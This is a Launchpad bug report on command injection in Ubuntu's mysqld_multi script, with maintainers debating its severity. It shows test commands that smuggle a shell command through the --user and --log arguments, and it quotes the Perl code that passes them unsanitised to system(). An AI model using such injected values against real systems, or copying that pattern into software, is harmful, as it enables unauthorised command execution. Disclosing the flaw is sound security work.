Ubuntu
mysql-5.1 package

command injections in mysqld_multi

Bug #782298 reported by Emanuel Bronshtein
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
mysql-5.1 (Ubuntu)
Expired
Wishlist
Unassigned

Bug Description

Binary package hint: mysql-server-5.1

/usr/bin/mysqld_multi have command injection bugs .

test case :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --example --silent > /tmp/mysqld_multi_example
1 ) report option :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" report --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:41:26 2011
Reporting MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$

2 ) start option :
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --log="/tmp/mlog;echo SystemInj;sh;echo 1" start
SystemInj
$

3 ) stop option
emanuel@emanuel-desktop:/tmp$ /usr/bin/mysqld_multi --defaults-file=/tmp/mysqld_multi_example --user="User ping;sh;" stop --silent
mysqld_multi log file version 2.16; run: Fri May 13 19:42:59 2011
Stopping MySQL servers
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Access denied for user 'User'@'localhost' (using password: NO)'
$

the bug can be found at :
1 ) sub report_mysqlds

    $com= get_mysqladmin_options($i, @groups);
    $com.= " ping >> /dev/null 2>&1";
    system($com);

2 ) sub start_mysqlds()

    $com.= $tmp;
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);

3 ) sub stop_mysqlds()

    $com= get_mysqladmin_options($i, @groups);
    $com.= " shutdown";
    $com.= " >> $opt_log 2>&1" if (!$opt_no_log);
    $com.= " &";
    system($com);

Serge Hallyn (serge-hallyn)
Changed in mysql-5.1 (Ubuntu):
importance: Undecided → High
tags: added: security
Dave Walker (davewalker)
security vulnerability: no → yes
Ursula Junque (ursinha)
tags: added: server
Revision history for this message
Marc Deslauriers (mdeslaur) wrote :

While this should get fixed, I don't really see a security issue here, unless an attacker can somehow control the parameters that mysqld_multi uses without them getting specified by the user on the command line.

Revision history for this message
Dave Walker (davewalker) wrote :

Thanks for your input Marc, based on this i'm dropping the priority and marking incomplete pending further information.

@Emanuel, Please can you provide further information on how this might cause an issue?

Thanks.

Changed in mysql-5.1 (Ubuntu):
status: New → Incomplete
importance: High → Wishlist
Revision history for this message
Launchpad Janitor (janitor) wrote :

[Expired for mysql-5.1 (Ubuntu) because there has been no activity for 60 days.]

Changed in mysql-5.1 (Ubuntu):
status: Incomplete → Expired
Revision history for this message
Emanuel Bronshtein (e3amn2l) wrote :

Yes, if some other program (GUI , Server side scripts , etc ...)
use a user supplied data as input to "mysqld_multi" command in vulnerable operations it will be a security issue.

To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.